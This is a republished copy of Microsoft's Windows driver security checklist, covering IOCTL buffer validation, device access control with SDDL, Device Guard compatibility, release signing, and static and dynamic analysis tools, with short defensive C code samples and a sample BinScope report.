Software-only kernel drivers do not use plug-and-play (PnP) to become associated with specific hardware IDs, and can run on any PC. Such a driver could be used for purposes other than the one originally intended, creating an attack vector. Because software-only kernel drivers contain additional risk, they must be limited to run on specific hardware (for example, by using a unique PnP ID to enable creation of a PnP driver, or by checking the SMBIOS table for the presence of specific hardware).
For example, imagine OEM Fabrikam wants to distribute a driver that enables an overclocking utility for their systems. If this software-only driver were to execute on a system from a different OEM, system instability or damage might result. Fabrikam's systems should include a unique PnP ID to enable creation of a PnP driver that is also updatable through Windows Update. If this is not possible, and Fabrikam authors a legacy driver, that driver should find another method to verify that it is executing on a Fabrikam system (for example, by examination of the SMBIOS table prior to enabling any capabilities).
Do not production sign test code
Security checklist item #4: Do not production code sign development, testing, and manufacturing kernel driver code.
Kernel driver code that is used for development, testing, or manufacturing might include dangerous capabilities that pose a security risk. This dangerous code should never be signed with a certificate that is trusted by Windows. The correct mechanism for executing dangerous driver code is to disable UEFI Secure Boot, enable the BCD "TESTSIGNING" option, and sign the development, test, and manufacturing code using an untrusted certificate (for example, one generated by makecert.exe).
Code signed by a trusted Software Publishers Certificate (SPC) or Windows Hardware Quality Labs (WHQL) signature must not facilitate bypass of Windows code integrity and security technologies. Before code is signed by a trusted SPC or WHQL signature, first ensure it complies with guidance from both Device.DevFund.Reliability.BasicSecurity and Creating Reliable Kernel-Mode Drivers. In addition, the code must not contain any dangerous behaviors, described below. For more information about driver signing, see Release driver signing later in this article.
Examples of dangerous behavior include the following:
Providing the ability to map arbitrary kernel, physical, or device memory to user mode.
Providing the ability to read or write arbitrary kernel, physical, or device memory, including port input/output (I/O).
Providing access to storage that bypasses Windows access control.
Providing the ability to modify hardware or firmware that the driver was not designed to manage.
Perform threat analysis
Security checklist item #5: Either modify an existing driver threat model or create a custom threat model for your driver.
In considering security, a common methodology is to create specific threat models that attempt to describe the types of attacks that are possible. This technique is useful when designing a driver because it forces the developer to consider the potential attack vectors against a driver in advance. Having identified potential threats, a driver developer can then consider means of defending against these threats in order to bolster the overall security of the driver component. This article provides driver-specific guidance for creating a lightweight threat model: Threat modeling for drivers. The article provides an example driver threat model diagram that can be used as a starting point for your driver.
Security Development Lifecycle (SDL) best practices and associated tools can be used by IHVs and OEMs to improve the security of their products. For more information see SDL recommendations for OEMs.
Follow driver secure coding guidelines
Security checklist item #6: Review your code and remove any known code vulnerabilities.
The core activity of creating secure drivers is identifying areas in the code that need to be changed to avoid known software vulnerabilities. Many of these known software vulnerabilities deal with keeping strict track of the use of memory, to avoid issues with others overwriting or otherwise compromising the memory locations that your driver uses. The Code Validation Tools section of this article describes software tools that can be used to help locate known software vulnerabilities.
Memory buffers
Always check the sizes of the input and output buffers to ensure that the buffers can hold all the requested data. For more information, see Failure to Check the Size of Buffers.
Properly initialize all output buffers with zeros before returning them to the caller. For more information, see Failure to Initialize Output Buffers.
Validate variable-length buffers. For more information, see Failure to Validate Variable-Length Buffers.
For more information about working with buffers and using ProbeForRead and ProbeForWrite to validate the address of a buffer, see Buffer Handling.
Use the appropriate method for accessing data buffers with IOCTLs
One of the primary responsibilities of a Windows driver is transferring data between user-mode applications and a system's devices. The three methods for accessing data buffers are shown in the following table:
IOCTL buffer type | Summary | For more information
METHOD_BUFFERED | Recommended for most situations | Using Buffered I/O
METHOD_IN_DIRECT or METHOD_OUT_DIRECT | Used in some high-speed HW I/O | Using Direct I/O
METHOD_NEITHER | Avoid if possible | Using Neither Buffered Nor Direct I/O
In general, buffered I/O is recommended as it provides the most secure buffering methods. But even when using buffered I/O there are risks, such as embedded pointers, that must be mitigated. For more information about working with buffers in IOCTLs, see Methods for Accessing Data Buffers.
Errors in use of IOCTL buffered I/O
Check the size of IOCTL-related buffers. For more information, see Failure to Check the Size of Buffers.
Properly initialize output buffers. For more information, see Failure to Initialize Output Buffers.
Properly validate variable-length buffers.
For more information, see Failure to Validate Variable-Length Buffers.
When using buffered I/O, be sure to return the proper length for the OutputBuffer in the IO_STATUS_BLOCK structure Information field. Don't just return the length directly from a READ request. For example, consider a situation where the returned data from the user space indicates that there is a 4K buffer. If the driver should actually return only 200 bytes, but instead just reports 4K in the Information field, an information disclosure vulnerability has occurred. This problem occurs because in earlier versions of Windows, the buffer the I/O Manager uses for buffered I/O is not zeroed. Thus, the user app gets back the original 200 bytes of data plus 4K-200 bytes of whatever was in the buffer (non-paged pool contents). This scenario can occur with all uses of buffered I/O and not just with IOCTLs. (A short code sketch illustrating these points appears a little further below.)
Errors in IOCTL direct I/O
Handle zero-length buffers correctly. For more information, see Errors in Direct I/O.
Errors in referencing user-space addresses
Validate pointers embedded in buffered I/O requests. For more information, see Errors in Referencing User-Space Addresses.
Validate any address in the user space before trying to use it, using APIs such as ProbeForRead and ProbeForWrite when appropriate.
TOCTOU vulnerabilities
There is a potential time-of-check-to-time-of-use (TOCTOU) vulnerability when using direct I/O (for IOCTLs or for Read/Write). Be aware that while the driver is accessing the user data buffer, the user can simultaneously be accessing it. To manage this risk, copy any parameters that need to be validated from the user data buffer to memory that is solely accessible from kernel mode (such as the stack or pool). Then, once the data cannot be accessed by the user application, validate and then operate on the data that was passed in.
Driver code must make correct use of memory
All driver pool allocations must be in non-executable (NX) pool. Using NX memory pools is inherently more secure than using executable non-paged (NP) pools, and provides better protection against overflow attacks. For more information about the related device fundamentals test, see Device.DevFund.Memory.NXPool.
Device drivers must properly handle various user-mode, as well as kernel to kernel I/O, requests. For more information about the related device fundamentals test, see Device.DevFund.Reliability.BasicSecurity.
To allow drivers to support HVCI virtualization, there are additional memory requirements. For more information, see Device Guard Compatibility later in this article.
Handles
Validate handles passed between user-mode and kernel-mode memory. For more information, see Handle Management and Failure to Validate Object Handles.
Device objects
Secure device objects. For more information, see Securing Device Objects.
Validate device objects. For more information, see Failure to Validate Device Objects.
IRPs
WDF and IRPs
One advantage of using WDF is that WDF drivers typically do not directly access IRPs. For example, the framework converts the WDM IRPs that represent read, write, and device I/O control operations to framework request objects that KMDF/UMDF receive in I/O queues. If you are writing a WDM driver, review the following guidance.
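To tie several of these points together, here is a minimal, hypothetical sketch of a METHOD_BUFFERED IOCTL handler in a WDM dispatch routine. The IOCTL code, data structure, and function names are invented for illustration; the sketch only demonstrates the buffer-size check, the zero-initialization of the output buffer, and reporting the number of bytes actually written in the Information field.

#include <ntddk.h>

// Hypothetical buffered IOCTL and reply structure, for illustration only.
#define IOCTL_MYDEV_GET_INFO \
    CTL_CODE(FILE_DEVICE_UNKNOWN, 0x800, METHOD_BUFFERED, FILE_READ_ACCESS)

typedef struct _MYDEV_INFO {
    ULONG Version;
    ULONG Flags;
} MYDEV_INFO, *PMYDEV_INFO;

NTSTATUS
MyDevDispatchDeviceControl(
    _In_ PDEVICE_OBJECT DeviceObject,
    _Inout_ PIRP Irp
    )
{
    PIO_STACK_LOCATION irpSp = IoGetCurrentIrpStackLocation(Irp);
    NTSTATUS status = STATUS_INVALID_DEVICE_REQUEST;
    ULONG_PTR information = 0;

    UNREFERENCED_PARAMETER(DeviceObject);

    switch (irpSp->Parameters.DeviceIoControl.IoControlCode) {
    case IOCTL_MYDEV_GET_INFO:
    {
        ULONG outLen = irpSp->Parameters.DeviceIoControl.OutputBufferLength;
        PMYDEV_INFO out = (PMYDEV_INFO)Irp->AssociatedIrp.SystemBuffer;

        // Check the size of the caller-supplied output buffer before using it.
        if (outLen < sizeof(MYDEV_INFO)) {
            status = STATUS_BUFFER_TOO_SMALL;
            break;
        }

        // METHOD_BUFFERED: input and output share SystemBuffer. Zero the
        // output area so no stale pool contents can leak back to user mode.
        RtlZeroMemory(out, outLen);

        out->Version = 1;
        out->Flags = 0;

        // Report only the number of bytes actually written, never the
        // full (possibly larger) output buffer length.
        information = sizeof(MYDEV_INFO);
        status = STATUS_SUCCESS;
        break;
    }
    default:
        break;
    }

    Irp->IoStatus.Status = status;
    Irp->IoStatus.Information = information;
    IoCompleteRequest(Irp, IO_NO_INCREMENT);
    return status;
}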
Properly manage IRP I/O buffers
The following articles provide information about validating IRP input values:
DispatchReadWrite Using Buffered I/O
Errors in Buffered I/O
DispatchReadWrite Using Direct I/O
Errors in Direct I/O
Security Issues for I/O Control Codes
Consider validating values that are associated with an IRP, such as buffer addresses and lengths. If you choose to use Neither I/O, be aware that unlike Read and Write, and unlike buffered I/O and direct I/O, when using a Neither I/O IOCTL the buffer pointers and lengths are not validated by the I/O Manager.
Handle IRP completion operations properly
A driver must never complete an IRP with a status value of STATUS_SUCCESS unless it actually supports and processes the IRP. For information about the correct ways to handle IRP completion operations, see Completing IRPs.
Manage driver IRP pending state
The driver should mark the IRP pending before it saves the IRP, and should consider including both the call to IoMarkIrpPending and the assignment in an interlocked sequence. For more information, see Failure to Check a Driver's State and Holding Incoming IRPs When A Device Is Paused.
Handle IRP cancellation operations properly
Cancel operations can be difficult to code properly because they typically execute asynchronously. Problems in the code that handles cancel operations can go unnoticed for a long time, because this code is typically not executed frequently in a running system. Be sure to read and understand all of the information supplied under Canceling IRPs. Pay special attention to Synchronizing IRP Cancellation and Points to Consider When Canceling IRPs. One recommended way to minimize the synchronization problems that are associated with cancel operations is to implement a cancel-safe IRP queue.
Handle IRP cleanup and close operations properly
Be sure that you understand the difference between IRP_MJ_CLEANUP and IRP_MJ_CLOSE requests. Cleanup requests arrive after an application closes all handles on a file object, but sometimes before all I/O requests have completed. Close requests arrive after all I/O requests for the file object have been completed or canceled. For more information, see the following articles:
DispatchCreate, DispatchClose, and DispatchCreateClose Routines
DispatchCleanup Routines
Errors in Handling Cleanup and Close Operations
For more information about handling IRPs correctly, see Additional Errors in Handling IRPs.
Other security issues
Use a lock or an interlocked sequence to prevent race conditions. For more information, see Errors in a Multiprocessor Environment.
Ensure that device drivers properly handle various user-mode as well as kernel to kernel I/O requests. For more information, see Device.DevFund.Reliability.BasicSecurity.
Ensure that no TDI filters or LSPs are installed by the driver or associated software packages during installation or usage. For more information about the related driver fundamentals test, see Device.DevFund.Security.
Use safe functions
Use safe string functions. For more information, see Using Safe String Functions.
Use safe arithmetic functions. For more information, see Arithmetic Functions in Safe Integer Library Routines.
Use safe conversion functions. For more information, see Conversion Functions in Safe Integer Library Routines. (A short example of these routines follows below.)
Additional code vulnerabilities
In addition to the possible vulnerabilities covered here, this article provides additional information about enhancing the security of kernel-mode driver code: Creating Reliable Kernel-Mode Drivers.
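As a small illustration of the safe string and safe integer routines mentioned above, the following sketch uses RtlStringCbPrintfW, RtlULongMult, and RtlULongAdd from ntstrsafe.h and ntintsafe.h. The helper name, buffer, and sizes are made up for the example; treat it as a sketch rather than a definitive implementation.

#include <ntddk.h>
#include <ntstrsafe.h>   // RtlStringCbPrintfW and related safe string routines
#include <ntintsafe.h>   // RtlULongAdd, RtlULongMult and related safe integer routines

// Illustrative helper: format a description string and compute a total
// allocation size without risking buffer overruns or integer overflows.
NTSTATUS
MyDevComputeSizes(
    _Out_writes_bytes_(DescriptionCb) PWSTR Description,
    _In_ size_t DescriptionCb,
    _In_ ULONG ItemCount,
    _In_ ULONG ItemSize,
    _Out_ PULONG TotalSize
    )
{
    NTSTATUS status;

    // Safe string formatting: the destination size is passed explicitly,
    // so the routine cannot write past the end of Description.
    status = RtlStringCbPrintfW(Description,
                                DescriptionCb,
                                L"mydev: %lu items",
                                ItemCount);
    if (!NT_SUCCESS(status)) {
        return status;
    }

    // Safe arithmetic: fails with STATUS_INTEGER_OVERFLOW instead of
    // silently wrapping, which could otherwise lead to an undersized
    // allocation and a later buffer overflow.
    status = RtlULongMult(ItemCount, ItemSize, TotalSize);
    if (!NT_SUCCESS(status)) {
        return status;
    }

    return RtlULongAdd(*TotalSize, (ULONG)sizeof(ULONG), TotalSize);
}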
For additional information about C and C++ secure coding, see Secure coding resources at the end of this article.
Manage driver access control
Security checklist item #7: Review your driver to make sure that you are properly controlling access.
Managing driver access control - WDF
Drivers must work to prevent users from inappropriately accessing a computer's devices and files. To prevent unauthorized access to devices and files, you must:
Name device objects only when necessary. Named device objects are generally only necessary for legacy reasons, for example if you have an application that expects to open the device using a particular name, or if you're using a non-PnP device/control device. Note that WDF drivers do not need to name their PnP device FDO in order to create a symbolic link using WdfDeviceCreateSymbolicLink.
Secure access to device objects and interfaces. In order to allow applications or other WDF drivers to access your PnP device PDO, you should use device interfaces. For more information, see Using Device Interfaces. A device interface serves as a symbolic link to your device stack's PDO. One of the better ways to control access to the PDO is by specifying an SDDL string in your INF. If the SDDL string is not in the INF file, Windows will apply a default security descriptor. For more information, see Securing Device Objects and SDDL for Device Objects.
For more information about controlling access, see the following articles:
Controlling Device Access in KMDF Drivers
Names, Security Descriptors and Device Classes - Making Device Objects Accessible… and SAFE, from the January/February 2017 issue of The NT Insider newsletter published by OSR.
Managing driver access control - WDM
If you are working with a WDM driver and you used a named device object, you can use IoCreateDeviceSecure and specify an SDDL string to secure it. When you implement IoCreateDeviceSecure, always specify a custom class GUID for DeviceClassGuid. You should not specify an existing class GUID here; doing so has the potential to break security settings or compatibility for other devices belonging to that class. For more information, see WdmlibIoCreateDeviceSecure.
For more information, see the following articles:
Controlling Device Access
Controlling Device Namespace Access
Windows security model for driver developers
Security Identifiers (SIDs) risk hierarchy
The following section describes the risk hierarchy of the common SIDs used in driver code. For general information about SDDL, see SDDL for Device Objects, SID Strings, and SDDL String Syntax.
It is important to understand that if lower-privilege callers are allowed to access the kernel, code risk is increased. In the summary below, risk increases as you move down the list and allow lower-privilege SIDs access to your driver functionality:
SY (System)
BA (Built-in Administrators)
LS (Local Service)
BU (Built-in User)
AC (Application Container)
Following the general least-privilege security principle, configure only the minimum level of access that is required for your driver to function.
WDM granular IOCTL security control
To further manage security when IOCTLs are sent by user-mode callers, the driver code can include the IoValidateDeviceIoControlAccess function. This function allows a driver to check access rights. Upon receiving an IOCTL, a driver can call IoValidateDeviceIoControlAccess, specifying FILE_READ_ACCESS, FILE_WRITE_ACCESS, or both.
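The following hypothetical sketch combines both techniques from this section: it creates a named control device whose default security descriptor is restricted by an SDDL string (SYSTEM and built-in administrators only) using IoCreateDeviceSecure, and it additionally performs a per-IOCTL access check with IoValidateDeviceIoControlAccess (available on recent Windows 10 versions). The device name, class GUID, and function names are invented for illustration.

#include <ntddk.h>
#include <wdmsec.h>      // IoCreateDeviceSecure (link against wdmsec.lib)

// Hypothetical class GUID for this control device. Always use your own
// GUID here; never reuse an existing device class GUID.
static const GUID GUID_MYDEV_CLASS =
    { 0x12345678, 0x1234, 0x1234,
      { 0x12, 0x34, 0x12, 0x34, 0x56, 0x78, 0x9a, 0xbc } };

// Allow generic all access only to SYSTEM (SY) and built-in administrators (BA).
static const UNICODE_STRING g_SddlSystemAdminOnly =
    RTL_CONSTANT_STRING(L"D:P(A;;GA;;;SY)(A;;GA;;;BA)");

NTSTATUS
MyDevCreateControlDevice(
    _In_ PDRIVER_OBJECT DriverObject,
    _Out_ PDEVICE_OBJECT *DeviceObject
    )
{
    UNICODE_STRING name = RTL_CONSTANT_STRING(L"\\Device\\MyDevCtl");

    // The SDDL string becomes the default security descriptor of the
    // named device object, so unprivileged callers cannot open it.
    return IoCreateDeviceSecure(DriverObject,
                                0,                       // no device extension
                                &name,
                                FILE_DEVICE_UNKNOWN,
                                FILE_DEVICE_SECURE_OPEN,
                                FALSE,                   // not exclusive
                                &g_SddlSystemAdminOnly,
                                &GUID_MYDEV_CLASS,
                                DeviceObject);
}

NTSTATUS
MyDevDeviceControlWithAccessCheck(
    _In_ PDEVICE_OBJECT DeviceObject,
    _Inout_ PIRP Irp
    )
{
    NTSTATUS status;

    UNREFERENCED_PARAMETER(DeviceObject);

    // Granular, per-IOCTL check on top of the device object ACL: reject
    // callers whose handle does not have write access to the device.
    status = IoValidateDeviceIoControlAccess(Irp, FILE_WRITE_ACCESS);
    if (!NT_SUCCESS(status)) {
        Irp->IoStatus.Status = status;
        Irp->IoStatus.Information = 0;
        IoCompleteRequest(Irp, IO_NO_INCREMENT);
        return status;
    }

    // A real dispatch routine would now switch on the IOCTL code as shown
    // in the earlier sketch; unrecognized requests are rejected here.
    status = STATUS_INVALID_DEVICE_REQUEST;
    Irp->IoStatus.Status = status;
    Irp->IoStatus.Information = 0;
    IoCompleteRequest(Irp, IO_NO_INCREMENT);
    return status;
}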
Implementing granular IOCTL security control does not replace the need to manage driver access using the techniques discussed above. For more information, see the following articles:
Defining I/O Control Codes
Validate Device Guard compatibility
Security checklist item #8: Validate that your driver uses memory so that it is Device Guard compatible.
Memory usage and Device Guard compatibility
Device Guard uses hardware technology and virtualization to isolate the Code Integrity (CI) decision-making function from the rest of the operating system. When using virtualization-based security to isolate CI, the only way kernel memory can become executable is through a CI verification. This means that kernel memory pages can never be Writable and Executable (W+X) and executable code cannot be directly modified.
To implement Device Guard compatible code, make sure your driver code does the following:
Opts in to NX by default
Uses NX APIs/flags for memory allocation (NonPagedPoolNx)
Does not use sections that are both writable and executable
Does not attempt to directly modify executable system memory
Does not use dynamic code in the kernel
Does not load data files as executable
Uses section alignment that is a multiple of 0x1000 (PAGE_SIZE), e.g. DRIVER_ALIGNMENT=0x1000
For more information about using the tool and a list of incompatible memory calls, see Use the Device Guard Readiness Tool to evaluate HVCI driver compatibility. For general information about Device Guard, see Windows 10 Device Guard and Credential Guard Demystified and Device Guard deployment guide. For more information about the related device fundamentals test, see Device.DevFund.DeviceGuard.
Follow technology-specific code best practices
Security checklist item #9: Review the following technology-specific guidance for your driver.
File systems
For more information about file system driver security, see the following articles:
Security Considerations for File Systems
File System Security Issues
Security Features for File Systems
Security Considerations for File System Filter Drivers
NDIS - Networking
For information about NDIS driver security, see Security Issues for Network Drivers.
Display
For information about display driver security, see <Content Pending>.
Printers
For information related to printer driver security, see V4 Printer Driver Security Considerations.
Windows Image Acquisition (WIA)
For information about WIA security, see Security Issues for Windows Image Acquisition (WIA) Drivers.
Enhance device installation security
Security checklist item #10: Review driver INF creation and installation guidance to make sure you are following best practices.
When you create the code that installs your driver, you must make sure that the installation of your device will always be performed in a secure manner.
A secure device installation is one that does the following:
Limits access to the device and its device interface classes
Limits access to the driver services that were created for the device
Protects driver files from modification or deletion
Limits access to the device's registry entries
Limits access to the device's WMI classes
Uses SetupAPI functions correctly
For more information, see the following articles:
Creating Secure Device Installations
Guidelines for Using SetupAPI
Using Device Installation Functions
Device and Driver Installation Advanced Topics
Perform peer code review
Security checklist item #11: Perform peer code review to look for issues not surfaced by the other tools and processes.
Seek out knowledgeable code reviewers to look for issues that you may have missed. A second set of eyes will often see issues that you may have overlooked. If you don't have suitable staff to review your code internally, consider engaging outside help for this purpose.
Execute proper release driver signing
Security checklist item #12: Use the Windows partner portal to properly sign your driver for distribution.
Before you release a driver package to the public, we recommend that you submit the package for certification. For more information, see Test for performance and compatibility, Get started with the Hardware program, Hardware Dashboard Services, and Attestation signing a kernel driver for public release.
Use code analysis in Visual Studio to investigate driver security
Security checklist item #13: Follow these steps to use the code analysis feature in Visual Studio to check for vulnerabilities in your driver code.
Use the code analysis feature in Visual Studio to check for security vulnerabilities in your code. The Windows Driver Kit (WDK) installs rule sets that are designed to check for issues in native driver code. For more information, see How to run Code Analysis for drivers and Code Analysis for drivers overview. For additional background on code analysis, see Visual Studio 2013 Static Code Analysis in depth.
To become familiar with code analysis, you can use one of the sample drivers, for example, the featured toaster sample (https://github.com/Microsoft/Windows-driver-samples/tree/master/general/toaster/toastDrv/kmdf/func/featured) or the ELAM Early Launch Anti-Malware sample (https://github.com/Microsoft/Windows-driver-samples/tree/master/security/elam).
Open the driver solution in Visual Studio.
In Visual Studio, for each project in the solution, change the project properties to use the desired rule set. For example: Project >> Properties >> Code Analysis >> General, select Recommended driver rules. In addition to using the recommended driver rules, use the Recommended native rules rule set.
Select Build >> Run Code Analysis on Solution.
View warnings in the Error List tab of the build output window in Visual Studio.
Click on the description for each warning to see the problematic area in your code.
Click on the linked warning code to see additional information.
Determine whether your code needs to be changed, or whether an annotation needs to be added to allow the code analysis engine to properly follow the intent of your code. For more information on code annotation, see Using SAL Annotations to Reduce C/C++ Code Defects and SAL 2.0 Annotations for Windows Drivers. For general information on SAL, refer to this article available from OSR:
https://www.osr.com/blog/2015/02/23/sal-annotations-dont-hate-im-beautiful/
Use Static Driver Verifier to check for vulnerabilities
Security checklist item #14: Follow these steps to use Static Driver Verifier (SDV) in Visual Studio to check for vulnerabilities in your driver code.
Static Driver Verifier (SDV) uses a set of interface rules and a model of the operating system to determine whether the driver interacts correctly with the Windows operating system. SDV finds defects in driver code that could point to potential bugs in drivers. For more information, see Introducing Static Driver Verifier and Static Driver Verifier. Note that only certain types of drivers are supported by SDV. For more information about the drivers that SDV can verify, see Supported Drivers.
To become familiar with SDV, you can use one of the sample drivers (for example, the featured toaster sample: https://github.com/Microsoft/Windows-driver-samples/tree/master/general/toaster/toastDrv/kmdf/func/featured).
Open the targeted driver solution in Visual Studio.
In Visual Studio, change the build type to Release. Static Driver Verifier requires that the build type be Release, not Debug.
In Visual Studio, select Build >> Build Solution.
In Visual Studio, select Driver >> Launch Static Driver Verifier.
In SDV, on the Rules tab, select Default under Rule Sets. Although the default rules find many common issues, consider running the more extensive All driver rules rule set as well.
On the Main tab of SDV, click Start.
When SDV is complete, review any warnings in the output. The Main tab displays the total number of defects found.
Click on each warning to load the SDV Report Page and examine the information associated with the possible code vulnerability. Use the report to investigate the verification result and to identify paths in your driver that fail an SDV verification. For more information, see Static Driver Verifier Report.
Check code with BinScope Binary Analyzer
Security checklist item #15: Follow these steps to use BinScope to double-check that compile and build options are configured to minimize known security issues.
Use BinScope to examine application binary files to identify coding and building practices that can potentially render the application vulnerable to attack or to being used as an attack vector. For more information, see New Version of BinScope Binary Analyzer and the user and getting started guides that are included with the tool download, as well as this BinScope Binary Analyzer TechNet Video.
Follow these steps to validate that the security compile options are properly configured in the code that you are shipping:
Download BinScope Analyzer and related documents from here: https://www.microsoft.com/download/details.aspx?id=44995.
Review the BinScope Getting Started Guide that you downloaded.
Use the MSI file to install BinScope on the target test machine that contains the compiled code you wish to validate.
Open a command prompt window and execute the following command to examine a compiled driver binary. Update the path to point to your compiled driver .sys file.
C:\Program Files\Microsoft BinScope 2014>binscope "C:\Samples\KMDF_Echo_Driver\echo.sys" /verbose /html /logfile c:\mylog.htm
Use a browser to review the BinScope report to confirm that all checks are marked (PASS).
By default, the HTML report is written to \users\<username>\BinScope\
There are three categories that may be output into a log file:
Failed checks [Fail]
Checks that didn't complete [Error]
Passed checks [Pass]
Note that passed checks are not written to the log by default and must be enabled by using the /verbose switch.
Results for Microsoft BinScope 2014 run on MyPC at 2017-01-28T00:18:48.3828242Z
Failed Checks
No failed checks.
Passed Checks
• C:\Samples\KMDF_Echo_Driver\echo.sys - ATLVersionCheck (PASS)
• C:\Samples\KMDF_Echo_Driver\echo.sys - ATLVulnCheck (PASS)
• C:\Samples\KMDF_Echo_Driver\echo.sys - CompilerVersionCheck (PASS)
• C:\Samples\KMDF_Echo_Driver\echo.sys - DBCheck (PASS)
• C:\Samples\KMDF_Echo_Driver\echo.sys - DefaultGSCookieCheck (PASS)
• C:\Samples\KMDF_Echo_Driver\echo.sys - ExecutableImportsCheck (PASS)
• C:\Samples\KMDF_Echo_Driver\echo.sys - GSCheck (PASS)
• C:\Samples\KMDF_Echo_Driver\echo.sys - GSFriendlyInitCheck (PASS)
• C:\Samples\KMDF_Echo_Driver\echo.sys - GSFunctionSafeBuffersCheck (PASS)
• C:\Samples\KMDF_Echo_Driver\echo.sys - HighEntropyVACheck (PASS)
• C:\Samples\KMDF_Echo_Driver\echo.sys - NXCheck (PASS)
• C:\Samples\KMDF_Echo_Driver\echo.sys - RSA32Check (PASS)
• C:\Samples\KMDF_Echo_Driver\echo.sys - SafeSEHCheck (PASS)
• C:\Samples\KMDF_Echo_Driver\echo.sys - SharedSectionCheck (PASS)
• C:\Samples\KMDF_Echo_Driver\echo.sys - VB6Check (PASS)
• C:\Samples\KMDF_Echo_Driver\echo.sys - WXCheck (PASS)
Checks Executed:
• ATLVersionCheck
• ATLVulnCheck
• CompilerVersionCheck
• DBCheck
• DefaultGSCookieCheck
• ExecutableImportsCheck
• GSCheck
• GSFriendlyInitCheck
• GSFunctionSafeBuffersCheck
• HighEntropyVACheck
• NXCheck
• RSA32Check
• SafeSEHCheck
• SharedSectionCheck
• VB6Check
• WXCheck
All Scanned Items
• C:\Samples\KMDF_Echo_Driver\echo.sys
Use additional code validation tools
Security checklist item #16: Use these additional tools to help validate that your code follows security recommendations and to probe for gaps that were missed in your development process.
In addition to the Visual Studio code analysis feature, Static Driver Verifier, and BinScope discussed above, use the following tools to probe for gaps that were missed in your development process.
Driver Verifier
Driver Verifier allows for live testing of the driver. Driver Verifier monitors Windows kernel-mode drivers and graphics drivers to detect illegal function calls or actions that might corrupt the system. Driver Verifier can subject the Windows drivers to a variety of stresses and tests to find improper behavior. For more information, see Driver Verifier.
Hardware compatibility program tests
The hardware compatibility program includes security-related tests that can be used to look for code vulnerabilities. The Windows Hardware Compatibility Program leverages the tests in the Windows Hardware Lab Kit (HLK). The HLK Device Fundamentals tests can be used on the command line to exercise driver code and probe for weaknesses. For general information about the device fundamentals tests and the hardware compatibility program, see Hardware Compatibility Specifications for Windows 10, version 1607.
The following tests are examples of tests that may be useful to check driver code for some behaviors associated with code vulnerabilities:
Device drivers must properly handle various user-mode, as well as kernel to kernel I/O, requests.
For more information, see Device.DevFund.Reliability.BasicSecurity.
The Device Fundamentals Penetration tests perform various forms of input attacks, which are a critical component of security testing. Attack and penetration testing can help identify vulnerabilities in software interfaces. Some basic fuzz testing, as well as the IoSpy and IoAttack utilities, are included. For more information, see Penetration Tests (Device Fundamentals) and How to Perform Fuzz Tests with IoSpy and IoAttack.
The CHAOS (Concurrent Hardware and Operating System) tests run various PnP driver tests, device driver fuzz tests, and power system tests concurrently. For more information, see CHAOS Tests (Device Fundamentals).
Device Path Exerciser runs as part of Device.DevFund.Reliability.BasicSecurity. For more information, see Device.DevFund.Reliability.
All driver pool allocations must be in NX pool. Using non-executable memory pools is inherently more secure than executable non-paged (NP) pools, and provides better protection against overflow attacks. For more information, see DevFund.Memory.NXPool.
Use the Device.DevFund.DeviceGuard test, along with the other tools described in this article, to confirm that your driver is Device Guard compatible.
Custom and domain-specific test tools
Consider the development of custom domain-specific security tests. To develop additional tests, gather input from the original designers of the software, as well as unrelated development resources familiar with the specific type of driver being developed, and one or more people familiar with security intrusion analysis and prevention.
Review debugger techniques and extensions
Security checklist item #17: Review these debugger tools and consider their use in your development debugging workflow.
!exploitable Crash Analyzer
The !exploitable Crash Analyzer is a Windows debugger extension that parses crash logs looking for unique issues. It also examines the type of crash and tries to determine whether the error is something that could be exploited by a malicious hacker. The Microsoft Security Engineering Center (MSEC) created the !exploitable Crash Analyzer. You can download it from CodePlex: http://msecdbg.codeplex.com/. For more information, see !Exploitable crash analyzer version 1.6 and the Channel 9 video !exploitable Crash Analyzer.
Security-related debugger commands
The !acl extension formats and displays the contents of an access control list (ACL). For more information, see Determining the ACL of an Object and !acl.
The !token extension displays a formatted view of a security token object. For more information, see !token.
The !tokenfields extension displays the names and offsets of the fields within the access token object (the TOKEN structure). For more information, see !tokenfields.
The !sid extension displays the security identifier (SID) at the specified address. For more information, see !sid.
The !sd extension displays the security descriptor at the specified address. For more information, see !sd.
Review secure coding resources
Security checklist item #18: Review these resources to expand your understanding of the secure coding best practices that are applicable to driver developers.
Review these resources to learn more about driver security.
Secure kernel-mode driver coding guidelines
Creating Reliable Kernel-Mode Drivers
Secure coding organizations
Carnegie Mellon University SEI CERT
Carnegie Mellon University SEI CERT C Coding Standard: Rules for Developing Safe, Reliable, and Secure Systems (2016 Edition), available as a PDF download.
CERT - Build Security In
MITRE - Weaknesses Addressed by the CERT C Secure Coding Standard
Building Security In Maturity Model (BSIMM) - https://www.bsimm.com/
SAFECode - https://www.safecode.org/
OSR
OSR provides driver development training and consulting services. These articles from the OSR newsletter highlight driver security issues:
Names, Security Descriptors and Device Classes - Making Device Objects Accessible… and SAFE
You've Gotta Use Protection -- Inside Driver & Device Security
Locking Down Drivers - A Survey of Techniques
Meltdown and Spectre: What about drivers?
Books
24 Deadly Sins of Software Security: Programming Flaws and How to Fix Them, Michael Howard, David LeBlanc and John Viega
The Art of Software Security Assessment: Identifying and Preventing Software Vulnerabilities, Mark Dowd, John McDonald and Justin Schuh
Writing Secure Code, Second Edition, Michael Howard and David LeBlanc
Secure Coding in C and C++ (SEI Series in Software Engineering), 2nd Edition, Robert C. Seacord
Programming the Microsoft Windows Driver Model (2nd Edition), Walter Oney
Developing Drivers with the Windows Driver Foundation (Developer Reference), Penny Orwick and Guy Smith
Training
Windows driver classroom training is available from vendors such as the following:
OSR
Winsider
Azius
Secure coding online training is available from a variety of sources. For example, this course is available from Coursera: https://www.coursera.org/learn/software-security. SAFECode offers free training as well: SAFECode/training
Professional certification
CERT offers a Secure Coding Professional Certification.
Summary of key takeaways
Driver security is a complex undertaking containing many elements, but here are a few key points to consider:
Drivers live in the Windows kernel, and having an issue when executing in the kernel exposes the entire operating system. Because of this, pay close attention to driver security and design with security in mind.
Apply the principle of least privilege: a. Use a strict SDDL string to restrict access to the driver. b. Further restrict individual IOCTLs.
Create a threat model to identify attack vectors and consider whether anything can be restricted further.
Be careful with regard to embedded pointers being passed in from user mode. They need to be probed, accessed within try/except, and they are prone to time-of-check-to-time-of-use (ToCToU) issues unless the value of the buffer is captured and compared. If you're unsure, use METHOD_BUFFERED as the IOCTL buffering method.
Use code scanning utilities to look for known code vulnerabilities and remediate any identified issues.
Seek out knowledgeable code reviewers to look for issues that you may have missed.
Use Driver Verifier and test your driver with multiple inputs, including corner cases.
Send comments about this article to Microsoft.
Sursa: https://docs.microsoft.com/en-us/windows-hardware/drivers/driversecurity/driver-security-checklist
-
